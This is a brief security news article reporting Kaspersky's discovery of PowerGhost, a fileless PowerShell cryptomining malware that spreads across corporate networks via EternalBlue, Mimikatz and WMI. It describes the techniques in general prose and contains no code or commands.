Threat Management, Threat Management, Malware

PowerGhost shell script leverages fileless techniques to scare up a cryptominer

Cybercriminals have created a newly discovered PowerShell-based malware program that spreads cryptomining software across infected businesses' local area networks using various fileless techniques, including the EternalBlue exploit.

Dubbed PowerGhost, the malware "is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers," warns a July 26 blog post from Kaspersky Lab, whose researchers uncovered the threat.

According to post co-authors and researchers Vladas Bulavas and Anatoly Kazantsev, the actors behind this campaign use exploits or remote administration tools to initially infect targets with the obfuscated, single-line PowerShell script. At that point, the script immediately downloads and executes the miner without writing it to the hard drive, launching the software by loading a PE file via reflective PE injection.

The modular PowerGhost script propagates itself across networks by leveraging the EternalBlue remote code execution exploit, as well as by using the password extraction tool Mimikatz tool to grab user account credentials from infected machines. These credentials are then used to log on to additional machines before the script launches a copy of itself via WMI (Windows Management instrumentation).

When it does successfully land on a new network machine, PowerGhost next tries to escalate its privileges using multiple Microsoft Windows exploits.

So far PowerGhost sightings have been most frequent in India, Brazil, Columbia and Turkey, reports Kaspersky, whose researchers even found one version of the script that included a DDoS tool component.

Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts video/multimedia projects — often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.